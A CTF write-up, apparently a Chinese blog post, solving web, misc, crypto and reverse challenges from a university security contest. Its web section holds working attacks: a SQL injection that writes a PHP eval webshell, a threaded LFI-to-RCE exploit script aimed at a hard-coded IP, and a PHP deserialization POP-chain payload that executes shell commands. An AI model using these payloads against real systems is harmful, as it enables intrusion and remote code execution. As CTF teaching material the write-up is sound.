河北师范大学信息安全挑战赛 - 初赛writup

最新推荐文章于 2022-11-13 13:36:33 发布
最新推荐文章于 2022-11-13 13:36:33 发布
阅读量216 收藏
点赞数
分类专栏: CTF 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/126612842
版权

WEB

mmmmd5d5d5d5

链接打开页面

image

绕过

?a[]=1&b[]=2

image

构造md5

<?php
for($i = 0 ; $i <= 100000 ; $i ++)
{
 if (substr(md5($i) , 5, 5) === "3ddc6")
 {
  echo $i;
  break;
 }
}
?>

进入到下一层

image

提交

ffifdyop

得到:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

image

构造payload:

param1[]=1&param2[]=2

即可得到flag

EDGnb(签到)

直接docker桌面版打开

image

即可得到flag

时光塔的宝藏

链接打开一个login框

image

构造payload:

pswd=admin&usname=admin' union select 1,"<?php eval($_POST[1]);?>" into outfile '/var/www/html/1203.php';#

image

蚁剑连1203.php,密码为1,即可得到flag

image

LFI_to_RCE

<?php
    show_source('./index.php');
    include $_GET['file'];
?>

Warning: include(): Filename cannot be empty in /var/www/html/index.php on line 3

Warning: include(): Failed opening '' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 3

贴上exp:

import requests
import io
import threading

url = "http://81.70.102.209:10040/index.php"
sessid = "21r000"

def write(session):
    filebytes = io.BytesIO(b'a' * 1024 * 50)
    while True:
        res = session.post(url,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php eval($_POST[1]);?>"
                },
            cookies={
                'PHPSESSID': sessid
                },
            files={
                'file': ('21r000.jpg', filebytes)
                }
            )

def read(session):
    while True:
        res = session.post(url+"?file=/tmp/sess_"+sessid,
                           data={
                               "1":"system('ls /');"
                           },
                           cookies={
                               "PHPSESSID":sessid
                           }
                           )
        if "etc" in res.text:
            print(res.text)



if __name__ == "__main__":
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read, args=(session,)).start()
    evnet.set()

image

访问即可得到flag

unserialize

<?php
error_reporting(0);
include 'hint.php';
class x{
    public $value;
    public $cc;
    function __wakeup(){
        die('fighting!!!');
    }
}

class a {
    public $nice;
    public function __destruct()
    {
        $this->nice = unserialize($this->nice);
        $this->nice->value = $fake;
        if($this->nice->value === $this->nice->cc)
            $this->test->good();
    }
}

class b {
    public $value;
    public $array;
    public function good(){
        if(is_array($this->array)){
            ($this->array)($this->value);
        }
        else{
            echo 'must_array';
        }
    }
}

class c {
    public $value;
    public function shell($func) {
        if(preg_match('/^[a-z0-9]*$/isD',$func)){
            die('y0u_A2e_HacKK!'); 
        }
        else{
            $func($this->value);
        }
    }
}

if (isset($_GET['pop'])) {
    $pop = base64_decode($_GET['pop']);
    unserialize($pop);
} else {
    highlight_file(__FILE__);
}

pop链问题把a:2改成a:3

?pop=TzoxOiJhIjozOntzOjQ6Im5pY2UiO3M6Mzc6Ik86MToieCI6Mjp7czo1OiJ2YWx1ZSI7TjtzOjI6ImNjIjtOO30iO3M6NDoidGVzdCI7TzoxOiJiIjoyOntzOjU6InZhbHVlIjtzOjc6IlxzeXN0ZW0iO3M6NToiYXJyYXkiO2E6Mjp7aTowO086MToiYyI6MTp7czo1OiJ2YWx1ZSI7czo5OiJjYXQgL2ZsYWciO31pOjE7czo1OiJzaGVsbCI7fX19

贴上poc

<?php
class x{
    public $value;
    public $cc;
	public function __construct()
	{
		$this->value = $fake;
		$this->cc = $fake;
	}
    function __wakeup(){
        die('fighting!!!');
    }
}

class a {
    public $nice;
	public function __construct()
	{
		$this->nice = serialize(new x());
		$this->test = new b();
	}
    public function __destruct()
    {
        $this->nice = unserialize($this->nice);
        $this->nice->value = $fake;
        if($this->nice->value === $this->nice->cc)
            $this->test->good();
    }
}

class b {
    public $value = "\system";
    public $array ;
	public function __construct()
	{
		$this->array = [new c(), 'shell'];
	}
    public function good(){
        if(is_array($this->array)){
            ($this->array)($this->value);
        }
        else{
            echo 'must_array';
        }
    }
}

class c {
    public $value = "cat /flag";
    public function shell($func) {
        if(preg_match('/^[a-z0-9]*$/isD',$func)){
            die('y0u_A2e_HacKK!'); 
        }
        else{
            $func($this->value);
        }
    }
}

$a = new a();
echo serialize($a);
echo "<br>";
echo base64_encode(serialize($a));

?>

misc

快来公众号ya

image

扫码即可

JamesHarden

附件下载解压后修改文件后缀,加上.zip后解压文件是是一个.class文件:

image

对URPGS{Jr1p0zr_G0_U3pg6_!}进行rot13解密得到flag:

image

捉迷藏

附件打开文件为一个word文档

image

根据文字提示,将作文内容字体大小改为12

发现为jsfuck加密

image

http://codertab.com/JsUnFuck在线网站中解密

解密得到flag

image

迷途的狗狗

附件打开

image

打开迷途的狗狗文件夹

image

压缩包中有一张图片,但是需要密码

在ziperello中使用暴力破击,字符集设定为数字

image

image

得到密码为142345,成功解压文件得到一张图片

image

在kali中使用binwalk分析文件内容

image

发现隐藏图片中隐藏了一个jpg文件

使用foremost分离文件

image

第二张图片中显示flag

image

snake

玩到6000分给了个提示

image

溯源找到源码

image

重新修改show_text函数

image

image

进行pyinstaller反打包后有个snake.pyc,pyc反编译成py后就是它的源码

image

image

得到flag:

image

问卷调查

简简单单签个退吧就,下次继续。

crypto

签到

附件打开

image

与佛论禅解密得到一串base64密文

SkJDVUdWQ0dQTlRXNjMzRUw1V0hLWTNMTDVURzY0UzdQRlhYSzdJPQ==

解密后再base32解密得到flag:

image

RSA_e_n

附件:

image

rsa中的e,n,c解密,直接上脚本:

import gmpy2
import RSAwienerHacker

e = 0x14b367bf01efd4dc667b8e62975479c612c96e78f7f1f55242b2973c882ddcb33a65c52174d8ae1273764ce429054ea3f2fdc38ff205443c92ef4198739f05aa11fc10d3fc6ff30c8f5f05a04f43e3d8fc9bfffe916b2e0360560a162729e91b7775bda70177e0f875626e0a81bd4eacea9948b02232a82659f8d9aa9b4c754f
n = 0x75be564267f8bf6c2038dd0cadfeecbc3158acfc27e679dd0bdb0db0e90bd5198a0a7edc0626f357a2d75f3c37ede045b7f7ca6bda79e5bf6fc0aea0aa7beda587388599d2b77b538fc3e666784493ffaf731e2ae232e8e9e9f9f2a4df25c19b7680f5bf6c485bd87923f01c17d8ec35438772c28e361774e6e7681d67ecbe19
c = 10127659956533419108589656976567211166527205183773088147543122705230809548550336271584049969380709512046523116316965506372940655242616078713681678662841367955124154879878984026023241163358487655249424233120021240245459984899558747887087199609289148343740081670749999484769650710161617077523656215330005636913
#爆破d
d = RSAwienerHacker.hack_RSA(e,n)
print(d)
m = gmpy2.powmod(c,d,n)
import binascii
print(binascii.unhexlify(hex(m)[2:]))

解得flag:

image

Tool

附件:

image

看上去是一串乱码,但是不难看出是维吉尼亚,直接丢在线网站得到key

image

根据恢复后的最后一段提示:

Well, you already know that thisis Virginia encryption, but unfortunately, the ultimate goal is not to get plaintext, but to get the key. For the flag of this question, you need to add an underscore in the middle of the key, and then add the flag standard format to it, and you can submit it.

在中间加入下划线即可得到flag

encode

附件:

image

emoji表情加密,直接在线解,得到:


   
   

    
    复制代码
  • 1
你好呀,送你串字符吧:ɯlxɹƃluʌ‾ʌdɹo‾ɟlq‾lʍ : dǝʇs ʇsɐl

文本倒序得到下一步:

image

根据题目提示《逾越节的阴谋》

image

可以知道是埃特巴什密码,解码后即可得到flag。

image

出题人flag改慢了emmmmm,血没了,暴打出题人。

re

hard

附件文本格式打卡,直接搜HECTF即可

image

pwn

签到

用wirshark追踪tcp流

image

渗透测试中心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php反序列化漏洞
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-31 2419
序列化: object的数据类型转换成数据串 object类型不能被存储 反序列化: 数据串的数据类型转换成object 在PHP应用中,序列化,反序列化一般用作缓存 对象 函数 魔术函数 __call()是在对象上下文中调用不可访问的方法时触发 __callStatic()是在静态上下文中调用不可访问的方法时触发。 __get()用于从不可访问的属性读取数据。 __set()用于将数据写入不可访问的属性。 __toString()方法允许一个类决定如何处理像一个字符串时它将如何反应。 __sleep()
CTF_WP:php-MD5碰撞
等风来
10-11 1211
SDUTsec-writeup:MD5碰撞 1.easy MD5-1: 题目链接:easy MD5-1. think carefully &amp;amp;amp;amp;lt;!-- ** if($_POST['param1']!==$_POST['param2'] &amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp; md5($_POST['param1'])===md5($_POST['param2'])){ die(&am
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2182
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
CTF中常见php-MD5()函数漏洞
热门推荐
等风来
10-11 2万+
CTF中常见php-MD5()函数漏洞 1.数字与字符串之间的比较 var_dump( 0 == "a" ); var_dump( "0" == "a" ); 第一个返回的是 true ,第二个返回的是 false 因为php把字母开头的转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前(如intval(’'123abd45gf)结果为123) 2.MD5函数漏洞 $...
php-MD5()函数漏洞
qq_42250840的博客
02-26 495
一、数字与字符串之间的比较 var_dump( 0 == "a" ); true var_dump( "0" == "a" );false php把字母开头的字符串转化为整型时,转化为0, 前面数字后面字母的话就只取到第一个字母出现的位置之前的数字。 二、MD5函数漏洞 $_GET['name'] != $_GET['password'] MD5($_GET['name']) == MD5($_...
图形化编程挑战赛-初赛试题说明.pdf
03-07
全国青少年电子信息智能创新大赛,规则,试题
Python编程挑战赛-初赛试题说明.pdf
06-06
Python 编程挑战赛初赛试题说明是一份详细的考试说明文档,旨在帮助考生和家长了解 Python 编程挑战赛初赛的考试形式、考核内容和考试题型等信息。该文档分为小学组和初中组两部分,每部分都涵盖了 Python 基础知识...
2019华为软件精英挑战赛-初赛赛制-v1.01
08-08
初赛赛制 - v1.0比赛时间3月8日 9:00 公布初赛赛题,大赛网站开放赛题、赛题包下载3月15日 9:00 - 3月29日 22:00 初赛练习阶段3月1
2019华为软件精英挑战赛-初赛-任务书-v1.01
08-08
2019华为软件精英挑战赛-初赛-任务书-v1.01
2019华为软件精英挑战赛-初赛-任务书-v1.51
08-08
刷新记录V1.02019-3-8V1.1修正图27、28示例2019-3-8V1.2修正8.11.4,8.11.5,8.11.6文字表述的车辆号2019-3-8
PHP中的MD5()函数漏洞
John_lain的博客
10-28 3595
文章目录1. MD5函数漏洞2.PHP特性3.MD5碰撞 1. MD5函数漏洞 $_GET['a'] != $_GET['b'] &amp;&amp; MD5($_GET['a']) == MD5($_GET['b']) 要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。因为是==比较,只判断值是否相等,不判断类型是否相同。如果类型不同先转换为相同类型再进行比较而PHP在处理哈希字...
easyphp(xctf)
m0_56107268的博客
11-13 556
php一些函数的绕过
[BJDCTF2020]EzPHP之preg_match绕过
weixin_42478365的博客
08-21 4120
打开链接之后发现页面为: 右击查看不了源码,按F12查看源码得到 GFXEIM3YFZYGQ4A= 使用base64,base32与base16一个一个试,得知是base32,解密之后为:1nD3x.php,之后在url上输入查看得到代码: <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $
MD5碰撞
weixin_30877493的博客
11-28 792
if ( $_POST['param1'] !==$_POST['param2'] && md5($_POST['param1']) === md5($_POST['param2'])){ echo "yes"; } 这串字符好绕吗?答案是肯定的,phpmd5函数处理数组时直接返回null,两个参数都为数组类型就好了 ?param1[]=1&param2[]=2 ...
8月7日CTF反序列化训练
slc3315的博客
08-08 1605
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
http路径转file会变成反斜杠_最全的PHP反序列化漏洞的理解和应用
weixin_39931923的博客
11-27 368
原创:f1r3K0合天智汇php反序列化漏洞,又叫php对象注入漏洞,是一种常见的漏洞,在我们进行代码审计以及CTF中经常能够遇到。01学习前最好提前掌握的知识PHP类与对象(https://www.php.net/manual/zh/language.oop5.phpPHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php...
unserialize函数和__wakeup魔术方法
Home to come
04-18 642
之前做过unserialize的题,当时看了wp,做是做出来来了,但是没有看懂这到底是什么东东,这次再次碰见了,认真的搜索了一下原理 什么是serialize? PHP 序列化后的内容是简单的文本格式,但是对字母大小写和空白(空格、回车、换行等)敏感,而且字符串是按照字节(或者说是 8 位的字符)计算的,因此,更合适的说法是 PHP 序列化后的内容是字节流格式。因此用其他语言实现时,如果所实现的...
serialize()序列化引起的魔术方法__wakeup()函数漏洞—攻防世界-web萌新-unserialize3
Sea_Sand息禅
04-17 3415
知识点: 1、serialize()函数:用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 2、unserialize()函数:用于将通过serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。 3、魔术方法:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除...
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6274
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
第十七届全国大学生信息安全竞赛 创新实践能力赛初赛
最新发布
05-21
第十七届全国大学生信息安全竞赛 创新实践能力赛初赛是由全国大学生信息安全竞赛组委会主办的比赛,旨在提高参赛选手的信息安全技能和实践能力,促进信息安全专业教育的发展。初赛主要分为两个环节:线上网络攻防赛...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值